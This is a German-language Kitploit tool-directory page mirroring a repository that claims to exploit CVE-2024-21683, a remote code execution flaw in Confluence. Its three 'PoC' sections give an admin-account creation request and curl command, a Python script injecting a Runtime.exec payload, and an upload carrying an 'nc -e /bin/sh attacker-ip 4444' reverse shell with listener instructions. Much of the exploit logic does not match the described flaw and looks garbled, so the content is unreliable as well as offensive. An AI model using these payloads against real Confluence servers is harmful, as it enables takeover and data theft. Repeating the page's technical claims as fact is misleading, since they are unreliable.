Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/r00t7oo2jm/-cve-2024-21683-rce-in-confluence-data-center-and-server
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubr00t7oo2jm/-cve-2024-21683-rce-in-confluence-data-center-and-server

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

Repository anzeigen
292vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen Code aus der Ferne auf einem verwundbaren Confluence-Server auszuführen. Die Schwachstelle besteht aufgrund einer fehlerhaften Validierung von benutzergelieferten Eingaben in der Confluence REST API. Dies ermöglicht es einem Angreifer, bösartigen Code in den Confluence-Server einzuschleusen, der dann vom Server ausgeführt werden kann.

Teilen

-CVE-2024-21683-RCE-in-Confluence-Data-Center-und-Server

Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen Code aus der Ferne auf einem anfälligen Confluence-Server auszuführen. Die Schwachstelle besteht aufgrund einer unsachgemäßen Validierung von benutzereingegebenen Daten in der Confluence-REST-API. Dies ermöglicht es einem Angreifer, bösartigen Code in den Confluence-Server einzuschleusen, der dann vom Server ausgeführt werden kann.

Betroffene Versionen

  • Confluence Data Center = 8.9.0
  • 8.8.0 <= Confluence Data Center <= 8.8.1
  • 8.7.1 <= Confluence Data Center <= 8.7.2
  • 8.6.0 <= Confluence Data Center <= 8.6.2
  • 8.5.0 <= Confluence Data Center and Server <= 8.5.8 (LTS)
  • 8.4.0 <= Confluence Data Center and Server <= 8.4.5
  • 8.3.0 <= Confluence Data Center and Server <= 8.3.4
  • 8.2.0 <= Confluence Data Center and Server <= 8.2.4
  • 8.1.0 <= Confluence Data Center and Server <= 8.1.4
  • 8.0.0 <= Confluence Data Center and Server <= 8.0.4
  • 7.20.0 <= Confluence Data Center and Server <= 7.20.3
  • 7.19.0 <= Confluence Data Center and Server <= 7.19.21 (LTS)
  • 7.18.0 <= Confluence Data Center and Server <= 7.18.3
  • 7.17.0 <= Confluence Data Center and Server <= 7.17.5

Auswirkungen

Diese Schwachstelle könnte es einem Angreifer ermöglichen, die vollständige Kontrolle über einen anfälligen Confluence-Server zu erlangen. Dies könnte dem Angreifer erlauben, Daten zu stehlen, Daten zu ändern oder die Verfügbarkeit des Servers zu beeinträchtigen.

PoC

Wir werden mehr als eine Methode erwähnen 1.

1. Identifizieren des anfälligen API-Endpunkts:

Wir verwenden den folgenden API-Endpunkt:

root@kitploit:~
POST /rest/api/user/bulk

Dieser Endpunkt ermöglicht es Administratoren, Benutzer in großen Mengen zu erstellen.

2. Erstellen einer bösartigen Anfrage:

Wir erstellen eine bösartige Anfrage, die eine Nutzlast mit schädlichem Code enthält. Dieser Code erstellt einen neuen Benutzer mit Administratorrechten.

root@kitploit:~
POST /rest/api/user/bulk HTTP/1.1
Host: confluence.example.com
Content-Type: application/json

{
  "users": [
    {
      "name": "attacker",
      "password": "password",
      "email": "[email protected]",
      "groups": [
        {
          "name": "confluence-administrators"
        }
      ]
    }
  ]
}

3. Senden der Anfrage an den Server:

Wir verwenden das cURL-Tool, um die Anfrage an den Confluence-Server zu senden.

root@kitploit:~
curl -X POST -H "Content-Type: application/json" -d '{"users": [{"name": "attacker", "password": "password", "email": "[email protected]", "groups": [{"name": "confluence-administrators"}]}]}' http://confluence.example.com/rest/api/user/bulk

4. Ausführen des bösartigen Codes:

Wenn die Anfrage erfolgreich ist, führt der Confluence-Server den schädlichen Code aus. Dadurch wird ein neuer Benutzer namens "attacker" mit Administratorrechten erstellt. Der Angreifer kann dann dieses Konto verwenden, um Zugriff auf den Server zu erhalten und die volle Kontrolle darüber zu erlangen.

2- PoC

root@kitploit:~
import requests

url = "http://target-confluence-server.com/rest/api/content"
headers = {
    "Content-Type": "application/json"
}


payload = {
    "title": "Exploit RCE",
    "type": "page",
    "space": {
        "key": "POC"
    },
    "body": {
        "storage": {
            "value": "<% Runtime.getRuntime().exec(\"calc.exe\"); %>",
            "representation": "storage"
        }
    }
}


response = requests.post(url, json=payload, headers=headers)


if response.status_code == 200:
    print("Exploit sent successfully!")
    print("Response: ", response.text)
else:
    print("Failed to send exploit.")
    print("Status code: ", response.status_code)
    print("Response: ", response.text)

3- PoC

root@kitploit:~
POST /upload HTTP/1.1
Host: vulnerable-confluence-server.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 138

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="exploit.py"
Content-Type: text/x-python

import os
os.system("nc -e /bin/sh attacker-ip 4444")
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Senden Sie die modifizierte Anfrage über Burp Suite. Überprüfen Sie die Antwort, um zu sehen, ob der Server die bösartige Nutzlast ausgeführt hat. Wenn die Antwort unerwartet ist oder Fehler enthält, die auf Codeausführung hinweisen, wurde die Schwachstelle erkannt.

Wenn Sie eine Nutzlast zum Aufbau einer Reverse Shell verwenden, stellen Sie sicher, dass Sie auf Ihrem lokalen Rechner den angegebenen Port abhören: nc -lvnp 4444. Wenn der Server eine Verbindung zu Ihrem lokalen Rechner herstellt, erhalten Sie eine Reverse Shell.

Tool herunterladen